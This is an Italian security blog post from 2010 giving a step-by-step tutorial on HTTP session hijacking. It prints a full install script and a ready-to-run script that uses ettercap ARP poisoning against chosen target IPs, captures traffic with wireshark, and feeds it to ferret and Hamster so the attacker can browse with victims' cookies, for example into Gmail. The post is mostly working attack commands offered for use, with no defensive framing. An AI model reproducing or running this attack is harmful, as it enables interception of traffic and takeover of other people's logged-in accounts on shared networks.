ClsHack:Computer Security Blog    

HTTP session hijacking with Ettercap and Hamster

Posted on: 18 July 2010

Grazie ad ettercap, è possibile effettuare in semplicità attacchi arp poisoning.

Per ulteriori approfondimenti:
TUTORIAL

Hamster, è un tool, che estrae dai pacchetti catturati con wireshark, durante un attacco arp poisoning, tutti i cookie.

In questo modo, non essendo loggati, sfruttando il cookie della vittima, nel 90 % dei casi potremo usufruire delle pagine in cui è loggato, ad esempio gmail.

Dal sito ufficiale:

Hamster is a proxy server.
There are a couple ways sidejacking could work.
One way would be a browser add-on.
Another way would be as a proxy server.
The hacker would connect through the proxy, which would then rewrite the cookies on behalf of the hacker.
The following shows Hamster in action. On this screen, we see the web browser “console” screen.

Vediamo come utilizzarlo sul nostro ubuntino :D

Apriamo la nostra console o.O
sudo -s
wget http://www.clshack.com/nopaste/install_hamster.sh

Controlliamo:
cat install_hamster.sh
Output:
#!/bin/bash
sudo apt-get install wireshark ettercap-gtk bison libcap2 libpcap-dev
sudo mkdir /opt/sidejack/
sudo mkdir /opt/sidejack/installer
cd /opt/sidejack/installer
sudo wget http://www.clshack.com/nopaste/hamster-2.0.0.zip
#http://hamster.erratasec.com/
sudo unzip hamster-2.0.0.zip
cd ferret/build/gcc4
sudo make
cd /opt/sidejack/installer/hamster/build/gcc4
sudo make
sudo cp /opt/sidejack/installer/ferret/bin/ferret /opt/sidejack/
sudo cp /opt/sidejack/installer/hamster/bin/* /opt/sidejack/
cd /opt/sidejack/
sudo rm -rf /opt/sidejack/installer/
sh install_ham*

Bene, ora possiamo eseguire lo script di Tim Gomez, per semplificare le cose :D
wget http://www.clshack.com/nopaste/hamster.sh
cat hamster.sh
Output:
#!/bin/bash
#Created By: Tim Gomez
TIMESTAMP="$(date +%a%H:%M)"
GW=$(ip route list match 0.0.0.0/0 | cut -d " " -f 3)
echo -n "Input Device to Sniff :"; read DEV
echo -n "Input Target(s) IP Address [192.168.1.1-253]:"; read TGT
echo "Starting MITM"
sudo ettercap -D -i "${DEV}" -t TCP -M arp:remote /${GW}/ /${TGT}/ -P repoison_arp
echo "Bada Bing Bada Boom - We're Sniffin' Packets!"
echo ""
echo "Minimize this shell until capture complete"
SNIFFER="$(sudo wireshark -i "${DEV}" -f tcp -w /opt/sidejack/pcap"${TIMESTAMP}" -k)"
pkill -f ettercap -U nobody
/opt/sidejack/./ferret -r /opt/sidejack/pcap"${TIMESTAMP}"
echo ""
echo ""
/opt/sidejack/./hamster

sh ham*

Ora, inseriamo quello che ci chiede lo script:

Una volta partito wireshark, lasciamolo lavorare.
Quando lo chiuderemo partirà hamster, sulla porta 1234.
Come utilizzarlo ? o.O

Impostiamo il proxy al nostro browser:
localhost:1234
E poi visitiamo:
http://localhost:1234
Li avremo l’interfaccia di hamster, con i siti visitati dagli ip vittiama e i loro cookie :D

Per ulteriori approfondimenti:
DOWNLOAD GUIDA UFFICIALE IN PDF

Related posts:

  1. [cronaca]Man in the Middle attack:Guida con ettercap
  2. Beef XSS 'Shell' Inject with ettercap and Arp Poisoning
  3. Installare ETTERCAP su WINDOWS E UBUNTU :)
  4. [GUIDA]ETTERCAP E I SUOI PLUGIN :)
  5. [How-To]Xplico:Network Forensic Analysis Tool

This entry was posted on Sunday, July 18th, 2010 at 9:14 am and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: